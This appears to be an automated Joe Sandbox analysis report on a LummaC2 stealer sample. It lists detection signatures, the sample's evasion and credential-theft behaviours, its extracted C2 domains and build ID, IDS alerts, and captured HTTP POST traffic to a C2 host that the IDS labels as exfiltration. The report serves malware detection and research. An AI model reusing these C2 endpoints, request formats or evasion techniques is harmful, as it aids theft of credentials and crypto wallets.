Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tPSrcPbmRe.exe

Overview

General Information

Sample name:tPSrcPbmRe.exe
renamed because original name is a hash value
Original sample name:259cea876b4ff788ed27fab1f9a978ce.exe
Analysis ID:1579658
MD5:259cea876b4ff788ed27fab1f9a978ce
SHA1:97928786646a7187c2a02c4acb9fb5b863dc1721
SHA256:7d6d42d07947b28756c4c28821f090b28d8f5f1262d355cd0a6d8ec02b49e81b
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • tPSrcPbmRe.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\tPSrcPbmRe.exe" MD5: 259CEA876B4FF788ED27FAB1F9A978CE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sustainskelet.lat", "necklacebudi.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "crosshuaht.lat", "rapeflowwj.lat", "sweepyribs.lat", "discokeyus.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:20.477893+010020283713Unknown Traffic192.168.2.64970723.55.153.106443TCP
                2024-12-23T07:09:22.985523+010020283713Unknown Traffic192.168.2.649710104.21.66.86443TCP
                2024-12-23T07:09:24.985880+010020283713Unknown Traffic192.168.2.649712104.21.66.86443TCP
                2024-12-23T07:09:27.420862+010020283713Unknown Traffic192.168.2.649718104.21.66.86443TCP
                2024-12-23T07:09:29.758273+010020283713Unknown Traffic192.168.2.649724104.21.66.86443TCP
                2024-12-23T07:09:32.243897+010020283713Unknown Traffic192.168.2.649730104.21.66.86443TCP
                2024-12-23T07:09:34.965088+010020283713Unknown Traffic192.168.2.649740104.21.66.86443TCP
                2024-12-23T07:09:37.537904+010020283713Unknown Traffic192.168.2.649747104.21.66.86443TCP
                2024-12-23T07:09:41.398205+010020283713Unknown Traffic192.168.2.649758104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:23.739006+010020546531A Network Trojan was detected192.168.2.649710104.21.66.86443TCP
                2024-12-23T07:09:25.764957+010020546531A Network Trojan was detected192.168.2.649712104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:23.739006+010020498361A Network Trojan was detected192.168.2.649710104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:25.764957+010020498121A Network Trojan was detected192.168.2.649712104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:18.373559+010020583541Domain Observed Used for C2 Detected192.168.2.6639061.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:18.656111+010020583581Domain Observed Used for C2 Detected192.168.2.6599671.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:17.944613+010020583601Domain Observed Used for C2 Detected192.168.2.6527981.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:18.228583+010020583621Domain Observed Used for C2 Detected192.168.2.6591031.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:17.648936+010020583641Domain Observed Used for C2 Detected192.168.2.6581851.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:18.086991+010020583701Domain Observed Used for C2 Detected192.168.2.6631371.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:18.796359+010020583741Domain Observed Used for C2 Detected192.168.2.6628271.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:18.514270+010020583761Domain Observed Used for C2 Detected192.168.2.6520771.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:17.454637+010020583781Domain Observed Used for C2 Detected192.168.2.6508361.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:37.551995+010020480941Malware Command and Control Activity Detected192.168.2.649747104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:09:21.404431+010028586661Domain Observed Used for C2 Detected192.168.2.64970723.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: tPSrcPbmRe.exeAvira: detected
                Found malware configuration
                Source: tPSrcPbmRe.exe.6480.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "necklacebudi.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "crosshuaht.lat", "rapeflowwj.lat", "sweepyribs.lat", "discokeyus.lat"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: tPSrcPbmRe.exeReversingLabs: Detection: 68%
                Source: tPSrcPbmRe.exeVirustotal: Detection: 69%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: tPSrcPbmRe.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: tPSrcPbmRe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49747 version: TLS 1.2
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.6:63137 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:58185 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.6:62827 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.6:59103 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.6:63906 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.6:52077 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:50836 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.6:59967 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:52798 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49707 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49747 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49747 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49758 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49740 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QA0GZX9INMITFNAV1TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12859Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IC694IXKWBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15057Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O4QKLE92WLBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19921Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U852JZ4VHFZ4M1T2BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6E5DHM678T6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572684Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr$ equals www.youtube.com (Youtube)
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=16848c626f92fe879f895702; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:09:21 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowe equals www.youtube.com (Youtube)
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
